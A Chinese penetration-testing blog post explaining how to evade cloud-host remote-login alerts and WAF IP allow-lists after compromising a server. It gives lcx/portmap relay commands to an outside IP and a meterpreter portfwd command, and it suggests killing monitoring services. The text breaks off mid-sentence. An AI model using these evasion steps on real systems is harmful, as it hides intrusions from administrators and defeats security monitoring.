云主机RDP/SSH异地登陆提醒绕过

声明：该公众号大部分文章来自作者日常学习笔记，也有少部分文章是经过原作者授权和其他公众号白名单转载，未经授权，严禁转载，如需转载，联系开白。

请勿利用文章内的相关技术从事非法测试，如因此产生的一切不良后果与文章作者和本公众号无关。

最近这段时间由于当本疫情、工作和暑期等原因比较浮躁，难以静不下心来写东西，下班回家就躺尸刷视频，没了当初的动力，感觉自己快废了。周末还是抽空找了篇库存分享给大家，希望大家从中能有所收获。

0x01 前言

国内几大云主机服务商都为客户提供了RDP/SSH异地登录提醒云监控功能，如：阿里、腾讯、百度、华为等，它能够有效的帮助服务器管理员快速确定是否被黑客恶意入侵，并且详细记录了异地登录者的登录区域和IP地址等信息，推送信息方式一般为云平台、语音、短信、邮件。

但如果我们作为一名渗透测试工作者在渗透某目标时通过前期的信息搜集确定为某云主机，即使成功拿到这台主机的权限也不建议直接去连接它的RDP/SSH，因为这样极易被服务器管理员发现，而且他们会收到云主机平台推送的安全告警信息，得不偿失。

图片

0x02 绕过异地登录提醒

这里以Portfwd和Lcx绕过腾讯云主机的异地登录提醒为例来做演示，其实就是通过当前已控制主机的流量来连接它的RDP/SSH。

1、Lcx服务端执行

lcx.exe -listen 13389 23389
./portmap -m 2 -p1 13899 -h2 127.0.0.1 -p2 23389

2、Lcx客户端执行

lcx.exe -slave 39.**.*.238 13899 127.0.0.1 3389

3、Msf会话中执行

meterpreter > portfwd add -r 127.0.0.1 -p 3389 -l 13389

图片

这样的好处就是在连接腾讯云主机RDP时的IP地址是127.0.0.1，所以不会触发异地登录提醒，这点可以在Windows安全日志或netstat -ano命令中看出。

图片

图片

0x03 绕过WAF黑白名单IP限制

大家都知道portfwd是MSF下的端口转发命令，但可能并没有发现最终连接IP的这个问题，在使用portfwd进行端口转发时可在一定程度上隐藏我们的真实连接IP地址，而且在特定情况下也能绕过WAF防护软件中的远程登录防护“黑白名单IP认证”限制，见下图。

图片

图片

图片

图片

笔者这里另外提供几个绕过思路，但仅可作为参考，并没有都去实践，不保证其可行性！！！

1) 端口转发、Socks4/5代理和隧道等技术；
2) RAT远控、AnyDesk、TeamViewer等工具；
3) 结束或停止某云主机上的监控相关进程和服务；

0x04 题外话

可能有的人会说，这不就是一个简单的LCX端口转发吗？没错，的确如此，但又有多少人发现这能绕过云主机异地登陆提醒和WAF的黑白名单IP认证限制？所以请......